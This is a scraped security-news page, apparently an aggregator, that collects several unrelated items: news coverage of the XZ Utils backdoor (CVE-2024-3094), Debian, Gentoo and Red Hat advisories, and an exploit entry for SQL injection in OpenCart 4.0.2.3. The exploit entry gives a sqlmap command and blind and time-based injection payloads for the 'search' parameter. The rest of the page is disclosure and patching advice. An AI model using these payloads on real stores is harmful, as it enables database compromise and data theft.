OpenCart Core version 4.0.2.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi# Date: 2024-04-2# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://github.com/opencart/opencart/releases# Version: 4.0.2.3# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=product/search&search=test- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs===========Output :Parameter: search (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: route=product/search&search=') AND 2427=2427-- drCaType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

OpenCart Core 4.0.2.3 SQL Injection

The malicious code inserted into the open-source library XZ Utils, a widely used package present in major Linux distributions, is also capable of facilitating remote code execution, a new analysis has revealed.
The audacious supply chain compromise, tracked as CVE-2024-3094 (CVSS score: 10.0), came to light last week when Microsoft engineer and PostgreSQL developer Andres Freund

Malicious Code in XZ Utils for Linux Systems Enables Remote Code Execution

Details are starting to emerge about a stunning supply chain attack that sent the open source software community reeling.

On Friday, a lone Microsoft developer rocked the world when he revealed a backdoor had been intentionally planted in XZ Utils, an open source data compression utility available on almost all installations of Linux and other Unix-like operating systems. The person or people behind this project likely spent years on it. They were likely very close to seeing the backdoor update merged into Debian and Red Hat, the two biggest distributions of Linux, when an eagle-eyed software developer spotted something fishy.

“This might be the best-executed supply chain attack we've seen described in the open, and it’s a nightmare scenario: malicious, competent, authorized upstream in a widely used library,” software and cryptography engineer Filippo Valsorda said of the effort, which came frightfully close to succeeding.

Researchers have spent the weekend gathering clues. Here’s what we know so far.

**What Is XZ Utils?**

XZ Utils is nearly ubiquitous in Linux. It provides lossless data compression on virtually all Unix-like operating systems, including Linux. XZ Utils provides critical functions for compressing and decompressing data during all kinds of operations. XZ Utils also supports the legacy .lzma format, making this component even more crucial.

**What Happened?**

Andres Freund, a developer and engineer working on Microsoft’s PostgreSQL offerings, was recently troubleshooting performance problems a Debian system was experiencing with SSH, the most widely used protocol for remotely logging in to devices over the Internet. Specifically, SSH logins were consuming too many CPU cycles and were generating errors with valgrind, a utility for monitoring computer memory.

Through sheer luck and Freund’s careful eye, he eventually discovered the problems were the result of updates that had been made to XZ Utils. On Friday, Freund took to the Open Source Security List to disclose the updates were the result of someone intentionally planting a backdoor in the compression software.

**What Does the Backdoor Do?**

Malicious code added to XZ Utils versions 5.6.0 and 5.6.1 modified the way the software functions when performing operations related to .lzma compression or decompression. When these functions involved SSH, they allowed for malicious code to be executed with root privileges. This code allowed someone in possession of a predetermined encryption key to log in to the backdoored system over SSH. From then on, that person would have the same level of control as any authorized administrator.

**How Did This Backdoor Come to Be?**

It would appear that this backdoor was years in the making. In 2021, someone with the username JiaT75 made their first known commit to an open source project. In retrospect, the change to the libarchive project is suspicious, because it replaced the safe\_fprint funcion with a variant that has long been recognized as less secure. No one noticed at the time.

The following year, JiaT75 submitted a patch over the XZ Utils mailing list, and, almost immediately, a never-before-seen participant named Jigar Kumar joined the discussion and argued that Lasse Collin, the longtime maintainer of XZ Utils, hadn’t been updating the software often or fast enough. Kumar, with the support of Dennis Ens and several other people who had never had a presence on the list, pressured Collin to bring on an additional developer to maintain the project.

In January 2023, JiaT75 made their first commit to XZ Utils. In the months following, JiaT75, who used the name Jia Tan, became increasingly involved in XZ Utils affairs. For instance, Tan replaced Collins’ contact information with their own on oss-fuzz, a project that scans open source software for vulnerabilities that can be exploited. Tan also requested that oss-fuzz disable the ifunc function during testing, a change that prevented it from detecting the malicious changes Tan would soon make to XZ Utils.

In February of this year, Tan issued commits for versions 5.6.0 and 5.6.1 of XZ Utils. The updates implemented the backdoor. In the following weeks, Tan or others appealed to developers of Ubuntu, Red Hat, and Debian to merge the updates into their OSes. Eventually, one of the two updates made its way into several releases, according to security firm Tenable. There’s more about Tan and the timeline here.

**Can You Say More About What This Backdoor Does?**

In a nutshell, it allows someone with the right private key to hijack sshd, the executable file responsible for making SSH connections, and from there to execute malicious commands. The backdoor is implemented through a five-stage loader that uses a series of simple but clever techniques to hide itself. It also provides the means for new payloads to be delivered without major changes being required.

Multiple people who have reverse-engineered the updates have much more to say about the backdoor. Developer Sam James provided an overview here.

The XZ Backdoor: Everything You Need to Know

By Waqas
Critical Backdoor Alert! Patch XZ Utils Now (CVE-2024-3094) & Secure Your Linux System. Learn how a hidden backdoor…
This is a post from HackRead.com Read the original post: Backdoor Discovered in XZ Utils: Patch Your Systems Now (CVE-2024-3094)

Critical Backdoor Alert! Patch XZ Utils Now (CVE-2024-3094) & Secure Your Linux System. Learn how a hidden backdoor puts Linux at risk and how to patch it immediately.

A critical security vulnerability, designated CVE-2024-3094, was recently discovered in the widely used XZ Utils package. This vulnerability threatens Linux systems with backdoor attacks.

For your information, XZ Utils is a collection of open-source command-line tools for data compression and decompression. It includes the popular xz command and the liblzma library, which is used by other software, most notably OpenSSH – the program that enables secure remote access to Linux systems.

****The Backdoor Explained****

The vulnerability involved a malicious backdoor hidden within the source code of XZ Utils, specifically in the liblzma library. This backdoor code, if triggered, could allow an attacker to gain unauthorized remote access to a vulnerable system through SSH. The attacker wouldn’t even need valid credentials, potentially granting complete control over the system.

****Impact and Discovery****

The potential impact of this vulnerability is severe. An attacker exploiting CVE-2024-3094 could steal sensitive data, install malware, disrupt critical operations, or even use the compromised system to launch further attacks.

Fortunately, the backdoor was discovered by the security community in late March 2024 before widespread distribution. This prevented a large-scale security breach. However, some Linux users remain vulnerable, especially those using unstable or rolling-release distributions.

****Who is Affected?****

According to OpenSSH’s report, the specific versions of XZ Utils containing the backdoor were 5.6.0 and 5.6.1. These versions were only recently released and did not make it into the stable branches of most major Linux distributions. However, users who manually compiled these versions from source code or installed them from non-standard repositories could be at risk.

Commenting on this, John Bambenek, President at Bambenek Consulting warned, _“_The original reports of this backdoor showed exploitation of this vulnerability via SSH which means it can be triggered even if the victim machine’s users don’t use XZ and its library. It seems this library tends to be installed by default on modern Linux distributions so organizations should immediately prioritize downgrading the package until a safe update is released, even if they don’t use the tools themselves._“_

****Mitigation and Prevention****

The most critical step to address this vulnerability is to update your system immediately. Most Linux distributions have released patch updates for XZ Utils. Here’s how to update depending on your distribution:

*   **Debian/Ubuntu:** Use sudo apt update and sudo apt upgrade commands.
*   **Red Hat/CentOS/Fedora:** Use sudo dnf update command.
*   **Other Distributions:** Refer to your distribution’s specific update instructions.

****Lessons Learned****

The discovery of CVE-2024-3094 emphasizes the importance of various security measures. Firstly, keeping software and systems updated with regular patches is crucial to mitigate potential risks.

Secondly, maintaining a sharp review process for open-source projects aids in the early detection of vulnerabilities. Thirdly, promoting security awareness among users and employees through education about risks and best practices is essential for enhancing overall protection. Adhering to these practices enables us to reduce the impact of vulnerabilities like CVE-2024-3094 and safeguard the security of our systems.

1.  New Linux Malware Alert: ‘Spinning YARN’ Hits Docker
2.  Crypto Stealing PyPI Malware Hits Windows, Linux Users
3.  Magnet Goblin Using Ivanti Flaws to Deploy Linux Malware
4.  Bifrost RAT Variant Hits Linux Devices, Mimics VMware Domain
5.  Xamalicious Backdoor Infects Android Apps, Affects 327K Devices

Backdoor Discovered in XZ Utils: Patch Your Systems Now (CVE-2024-3094)

Had a Microsoft developer not spotted the malware when he did, the outcome could have been much worse.

Source: ozrimoz via Shutterstock

A newly discovered backdoor in XZ Utils, a data compression utility present in nearly all Linux distributions, has revived the ghosts of previous major software-supply chain security scares such as the Log4Shell vulnerability and the attack on SolarWinds.

The backdoor is embedded in an XZ library called liblzma and gives remote attackers a way to bypass secure shell (sshd) authentication and then gain complete access to an affected system. An individual with maintainer-level access to the code appears to have deliberately introduced the backdoor in a painstakingly executed, multiyear attack.

**A Shock to the OSS Community**

The backdoor affects XZ Utils 5.6.0 and 5.6.1, which are versions of the utility currently used only in unstable and beta releases of Fedora, Debian, Kali, open SUSE, and Arch Linux. As a result, the potential threat with this backdoor for now is considerably more limited than if the malware had found its way into a stable Linux distro.

Even so, the fact that someone managed to sneak a nearly undetectable backdoor into a trusted, widely used open source component — and the potential havoc it could have caused — has come as a painful wakeup call on how vulnerable organizations remain to attacks via the supply chain.

"This supply chain attack came as a shock to the OSS community, as XZ Utils was considered a trusted and scrutinized project," JFrog researchers said in a blog post. "The attacker built up a credible reputation as an OSS developer over the span of multiple years and used highly obfuscated code in order to evade detection by code reviews."

XZ Util is a command-line utility for compressing and decompressing data in Linux and other Unix-like operating systems. Microsoft developer Andres Freund discovered the backdoor in the software when investigating odd behavior in recent weeks around liblzma on some Debian installations. After initially thinking the backdoor was purely a Debian problem, Freund discovered the issue actually impacted the upstream XZ repository and associated tarballs or archive files. He publicly disclosed the threat on March 29.

Over the weekend, security teams associated with Fedora, Debian, openSUSE, Kali, and Arch issued urgent advisories alerting organizations running the affected Linux releases to immediately revert to earlier, more stable releases of their software to mitigate the potential risk of remote-code execution.

**Maximum Severity Vuln**

Red Hat, the primary sponsor and contributor to Fedora, assigned the backdoor a vulnerability identifier (CVE-2024-3094) and assessed it as a maximum severity risk (CVSS score of 10) to draw attention to the threat. The US Cybersecurity and Infrastructure Security Agency (CISA) joined the chorus of voices urging organizations using affected Linux distributions to downgrade their XZ Utils to an earlier version, and to hunt for any potential activity related to the backdoor and report any such findings to the agency.

All of the advisories offered tips for users on how to quickly check for the presence of the back-doored XZ versions in their code. Red Hat released an update that reverts XZ to previous versions, which the company will make available via its normal update process. But users concerned about potential attacks can force the update if they don't want to wait for the update to become available via the normal process, the company said.

Today Binarly released a free tool that organizations can use to look for backdoored XZs as well.

"Had this malicious code been introduced to stable OS releases in multiple Linux distributions, we could have seen in-the-wild exploitation en-masse," says Scott Caveza, staff research engineer at Tenable. "The longer this went unnoticed, the greater the potential for more malicious code from whomever this malicious actor might be."

In an FAQ, Tenable described the backdoor as modifying functions within liblzma in such a way as to allow attackers to intercept and modify data within the library. "In the example observed by Freund, under certain conditions, this backdoor could allow a malicious actor to 'break sshd authentication,' allowing the attacker to gain access to an affected system," noted the researchers.

**XZ Utils "Maintainer" Behind the Backdoor**

What makes the backdoor especially troublesome is the fact that someone using an account belonging to a maintainer of XZ Util embedded the malware in the package in what appears to have been a carefully planned multiyear operation. In a widely referenced blog post, security researcher Evan Boehs traced the malicious activity back to 2021 when an individual using the name Jia Tan created a GitHub account and almost immediately started making suspicious changes to some open source projects.

The blog post provides a detailed timeline of the steps Jia Tan and a couple of other individuals took to gradually build enough trust within the XZ community to make changes to the software and eventually introduce the backdoor.

"All the evidence points to social manipulation being used by a person with the sole end goal of inserting a backdoor," Boehs tells Dark Reading. "Basically, there was never a genuine effort to maintain the project, only to gain enough trust to insert \[the backdoor\] quietly."

Typically, gaining commit access to a repository requires an individual to establish a sense of trustworthiness. Often, projects give new commit access to individuals only when there is a need for it and after some risk assessment, Boehs says.

"In this case, Jia created a \[seemingly\] legitimate need for more maintainers ... and then began building trust. Our society is built on trust, and occasionally some crafty people exploit it," he notes. "Gaining permission requires trust. Trust takes time to establish. Jia was in it for the long game."

Boehs says it's unclear when exactly Jia Tan became a trusted member of the repository. But soon after his first commit in 2022, Jia Tan became a regular contributor and is currently the second-most active on the project. GitHub has since suspended Jia Tan's account.

Saumitra Das, vice president of engineering at Qualys, says what happened with XZ Util can happen elsewhere.

"Many critical libraries in open source are being maintained by volunteers in the community who are not paid for it and can be under pressure due to their personal issues," Das says.

Maintainers who are under pressure often welcome contributors who are willing to spend even a little bit of time on their projects. "Over, time, such folks can gain more control over the code," as was the case with XZ Utils, he says.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

XZ Utils Backdoor Implanted in Carefully Executed, Multiyear Supply Chain Attack

Debian Linux Security Advisory 5651-1 - Two security issues were discovered in MediaWiki, a website engine for collaborative work, which could result in cross-site scripting or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5651-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 31, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : mediawikiCVE ID         : not yet availableTwo security issues were discovered in MediaWiki, a website engine forcollaborative work, which could result in cross-site scripting or denialof service.For the oldstable distribution (bullseye), this problem has been fixedin version 1:1.35.13-1+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 1:1.39.7-1~deb12u1.We recommend that you upgrade your mediawiki packages.For the detailed security status of mediawiki please refer toits security tracker page at:https://security-tracker.debian.org/tracker/mediawikiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYJtD4ACgkQEMKTtsN8TjZxJA//c0hvMWL9Z5zN5rxn3K+Zc6SL9EjbOsWuOcpGWInkdNGKFL1ohLsoWKo5tZRA/KuGv9LNMJU/StYbb10s7yuSsHWnJ3/DXXs7LV9voOam4SCyOQoSQ1/VOL2IpdzycN9algbPXxMUYTu9NA1ogSFrjLvdFDpcEmzl2bnhlVLV554a1DeLY7S9PFyH7Z89KbcDq/SJg1qXArvUNyCPnfdEAdfJgzuOoFECGDOwloFEy89zShZK03FiylJ+o0kGzDOk0Knk9cE1vkdLlDVpBg9YaQpA9S4Pv6dCEQm3TYvFPqX6sbeO0l7cX8TLKntrON2ElMrATzV2o269RuB7CLoIX4KIIG61pEkWDM/ZAvzvPox8XbZqgnNVZiBZc02SXuvJ0W0HsBhh5mHHSGznWXvh6DxD/pVWR4+TWzs4Il/vdfCStMu8Oaw1BjnqsJkIgHK3SSGIuxfMYGsiJZ4eK40fJ6+v7b7m2mtaHgpSEgCZyn0dtr70OwkH0slr7BTpwnWQ/1svGB2aPQ82Wip+dJuap/xRI60tnbT8ipM17Vq8ECeL65ef4R+Atf6L4cC7TQCMXI66XU/ZYSUpiOs2qYDI9aqzT90EgyQkRnJbbIh4xDd3mqSFIxXVR4d/J5poHPiVo9Gr8LVldyfDNa2OCdxhJ74DyY+qkgaH43Yb0CmFEak==YhNf-----END PGP SIGNATURE-----

Debian Security Advisory 5651-1

Gentoo Linux Security Advisory 202403-4 - A backdoor has been discovered in XZ utils that could lead to remote compromise of systems. Versions less than 5.6.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: XZ utils: Backdoor in release tarballs  
     Date: March 29, 2024  
     Bugs: #928134  
       ID: 202403-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A backdoor has been discovered in XZ utils that could lead to remote  
compromise of systems.

Background  
==========

XZ Utils is free general-purpose data compression software with a high  
compression ratio.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-arch/xz-utils  >= 5.6.0      < 5.6.0

Description  
===========

A backdoor has been discovered in XZ utils. Please review the CVE  
identifier referenced below for details.

Impact  
======

Our current understanding of the backdoor is that is does not affect  
Gentoo systems, because

1. the backdoor only appears to be included on specific systems and  
Gentoo does not qualify;  
2. the backdoor as it is currently understood targets OpenSSH patched to  
work with systemd-notify support. Gentoo does not support or include  
these patches;

Analysis is still ongoing, however, and additional vectors may still be  
identified. For this reason we are still issuing this advisory as if  
that will be the case.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All XZ utils users should downgrade to the latest version before the  
backdoor was introduced:

  # emerge --sync  
  # emerge --ask --oneshot --verbose "<app-arch/xz-utils-5.6.0"

References  
==========

[ 1 ] CVE-2024-3094  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3094

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-04

A use-after-free vulnerability exists in the Linux kernel netfilter: nf_tables component. This is a universal local privilege escalation proof of concept exploit working on Linux kernels between 5.14 and 6.6, including Debian, Ubuntu, and KernelCTF.

Linux nf_tables Local Privilege Escalation

Debian Linux Security Advisory 5650-1 - Skyler Ferrante discovered that the wall tool from util-linux does not properly handle escape sequences from command line arguments. A local attacker can take advantage of this flaw for information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5650-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
March 31, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : util-linux  
CVE ID         : CVE-2024-28085  
Debian Bug     : 1067849

Skyler Ferrante discovered that the wall tool from util-linux does not  
properly handle escape sequences from command line arguments. A local  
attacker can take advantage of this flaw for information disclosure.

With this update wall and write are not anymore installed with setgid  
tty.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.36.1-8+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.38.1-5+deb12u1.

We recommend that you upgrade your util-linux packages.

For the detailed security status of util-linux please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/util-linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYJTYpfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Sm+A//cJhy/p0UGnSP5MYNc1a1sLeAMcNJm4lwxqR3zDYYqPWAe0jwsspaguNY  
1QPdaqa3d/Vm8pDO8WCnqxuzwqDjwyKNLUYmFbOyDx+U4EyVxC6wsUq936XMvx/5  
xiuTJripQm8urnvCaa7lGLhNSWHOc2jHWCqLnXC2AKwAtSGT7LWFKzC8csHxtRYO  
5A5iUaDONPWJtGpNDx1cczfIuEUvGpANQWOgxrcyAmHb1kjpGHm0RTikpkqKNm4W  
VH+DbgzuXlLtzUn0/YUXJPJkZtPe1LDshhUwFhU13K2lIUk3hWBWyGIrXgG+OZhu  
XgPc/5yAZHjmffHawUPE0LWGA3U6xOWV3pvBIi07XF/kFwR00PXGfMdv9WrTUxxV  
V6Fv5/kd2MsWvZQSYJ9Bn/6Wo5O9w8M3Lfso2OYx01OFRQHQfn4rfRek0ED81155  
qqPaemJYeUIJsDEmiwdr+eh0LZm7+3oMOgdfKDc9ARm9fasWxA7SFg4w5P1h0IWO  
lzuwEzm2W0az9YJ/BFMaZfoTTn/DW9FJHL7Fo5F2vO9CLAihxMYUDM3mUZNBexY8  
Z6XzhdWOSkOAiYI4khDK/TK8jQxSpEjNiFh7Z2pIZs4F6COjI94xtIn+N5nyJxnk  
AweXW0GGSZxt1sXD99JeD27Rv0UXNKyHfcQRPaYo9FyHntkVxi4=  
=jL1I  
-----END PGP SIGNATURE-----

Debian Security Advisory 5650-1

Red Hat Security Advisory 2024-1576-03 - An update for the ruby:3.1 module is now available for Red Hat Enterprise Linux 9. Issues addressed include HTTP response splitting and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1576.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ruby:3.1 security, bug fix, and enhancement updateAdvisory ID:        RHSA-2024:1576-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1576Issue date:         2024-04-01Revision:           03CVE Names:          CVE-2021-33621====================================================================Summary: An update for the ruby:3.1 module is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.The following packages have been upgraded to a later upstream version: ruby (3.1). (RHEL-29052)Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability - upstream's incomplete fix for CVE-2023-28755 (CVE-2023-36617)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)Bug Fix(es):* ruby/rubygem-irb: IRB has hard dependency on rubygem-rdoc (RHEL-29048)* ruby: Ruby cannot read private key in FIPS mode on RHEL 9 (RHEL-12437)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-33621References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2149706https://bugzilla.redhat.com/show_bug.cgi?id=2184059https://bugzilla.redhat.com/show_bug.cgi?id=2184061https://bugzilla.redhat.com/show_bug.cgi?id=2218614

Tag

#linux